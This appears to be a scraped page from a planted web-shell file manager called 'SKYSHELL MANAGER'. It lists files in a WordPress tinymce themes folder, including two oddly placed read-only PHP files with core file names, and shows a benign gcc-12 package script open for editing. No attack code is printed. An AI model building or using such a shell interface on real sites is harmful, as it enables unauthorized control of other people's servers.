📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: gcc-12.preinst
#!/bin/sh set -e if [ "$1" = "upgrade" ] || [ "$1" = "install" ]; then # remove bad symlink introduced in 12.3.0-4 if [ -h /usr/libexec/gcc/x86_64-linux-gnu/12 ]; then rm -f /usr/libexec/gcc/x86_64-linux-gnu/12 fi fi exit 0
Save